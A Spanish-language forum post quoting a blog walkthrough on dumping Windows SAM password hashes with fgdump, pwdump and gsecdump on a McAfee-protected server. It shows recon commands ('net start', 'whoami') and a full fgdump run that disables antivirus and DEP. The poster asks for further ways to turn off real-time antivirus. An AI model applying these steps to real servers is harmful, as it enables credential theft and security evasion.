Extraer hashes de la sam de un servidor protegido con mcafee

Iniciado por markitusf1, 3 Diciembre 2011, 09:33 AM

0 Miembros y 1 Visitante están viendo este tema.

markitusf1

Buenos dias a todos aquí os dejo un interesante blog, lo he probado todo pero sigo sin poder desactivar en tiempo real el antivirus del servidor

¿Conoceis otro programa o otra forma de hacerlo?

Blog,

Es muy frecuente encontrarse con antivirus instalados en los servidores Windows de donde se quiere extraer la SAM que impiden ejecutar los programas para volcar la información de los passwords dado que los detectan como malware y bloquean su ejecución. A modo de ejemplo, antivirus tan conocidos como VirusScan de Mcafee, TrendMicro o Kaspersky detectan las aplicaciones gsecdump y pwdump6 y pwdump7 como malware, hacktool, etc. e impiden su correcta ejecución, en cambio, Mcafee es el único motor antivirus que sí detecta fgdump como un virus. Para poder utilizar estas herramientas es preciso desactivar la protección en tiempo real que tienen configurada los antivirus presentes en el servidor.

- Usuario con privilegios: ya sea de forma remota o localmente, es necesario disponer de un usuario válido con privilegios de administrador local en el servidor para acceder al fichero de contraseñas (SAM) almacenado en el disco duro. Si se quiere extraer la SAM remotamente se puede recurrir a herramientas como "psexec" y si es de forma local, únicamente es necesario ejecutar la aplicación deseada (pwdumpX, fgdump o gsecdump) en el servidor analizado.

- Programas: como se ha visto existen diferentes herramientas capaces de extraer las contraseñas de un fichero SAM (múltiples versiones de pwdump, gsecdump, fgdump, etc.). Cuál utilizar contra un servidor depende de los factores antes descritos. A modo de ejamplo, se va a mostrar el funcionamiento de fgdump que es una de esas aplicaciones existentes que es sencilla de usar a la vez que potente y que resulta idónea para trastear con el archivo SAM de un servidor Windows.

EJEMPLO DE USO CON FGDUMP
Fgdump es una aplicación basada en pwdump6 que se puede descargar de la dirección http://www.foofus.net/~fizzgig/fgdump/downloads.htm y que tiene la opción de funcionar en sistemas de 32 ó 64 bits y, además, permite deshabilitar el antivirus que pueda existir instalado en el servidor. Fgdump también es capaz de desactivar la protección DEP (Prevención de Ejecución de Datos) que en los sistemas Windows más nuevos e incluso en Windows XP SP2 protege al sistema de la ejecución de determinados programas como los destinados a volcar el contenido de la SAM.

Lo primero es disponer de un usuario con permisos suficientes para ejecutar la herramienta y poder acceder al archivo de la SAM. Esto se puede comprobar ejecutando, en una ventana de MS-DOS (cmd.exe) dentro del servidor Windows, el comando "whoami /all" que muestra el usuario con el que se está conectado y los permisos de que éste dispone.

Para analizar la existencia o no de algún antivirus configurado en el servidor y de qué tipo (Mcafee, Kaspersky, etc.), lo más sencillo es ejecutar el comando "net start" y ver qué servicios se están ejecutando

Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

c:\net start
These Windows services are started:

Application Experience
...

McAfee Firewall Core Service
McAfee Host Intrusion Prevention Service
McAfee McShield
McAfee Task Manager
McAfee Validation Trust Protection Service
Network Connections
...
Se trata de un servidor Windows 2008 con el Service Pack 2 como se puede deducir de la versión de Windows proporcionada: 6.0.6002 que tiene un antivirus VirusScan de Mcafee configurado.

C:\>whoami hacktimes.com\administrator
el nombre de usuario ya lo dice todo, se dispone de permisos y privilegios para ejecutar la herramienta y acceder al fichero SAM. En un servidor Windows sin antivirus el funcionamiento y los parámetros de fgdump serían:

C:\>fgdump (sin parámetros ya detecta automáticamente si se trata de un sistema de 32 ó 64 bits, desactiva el antivirus y la protección DEP)
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

No parameters specified, doing a local dump. Specify -? if you are looking for help.
--- Session ID: 2011-10-17-10-36-51 ---
Starting dump on 127.0.0.1

** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Vista Server (Build 6002) (64 bit)
Passwords dumped successfully
Cache dumped successfully

-----Summary-----

Failed servers:
NONE

Successful servers:
127.0.0.1

Total failed: 0
Total successful: 1
Fgdump crea 3 archivos nuevos "127.0.0.1.cachedump" con la información de las sesiones abiertas en el servidor, "127.0.0.1.pwdump" donde ha extraído la información del fichero SAM y "2011-10-17-10.39-43.fgdump-log" que no es más que el fichero de LOG de la herramienta.


Salu2

Makusf1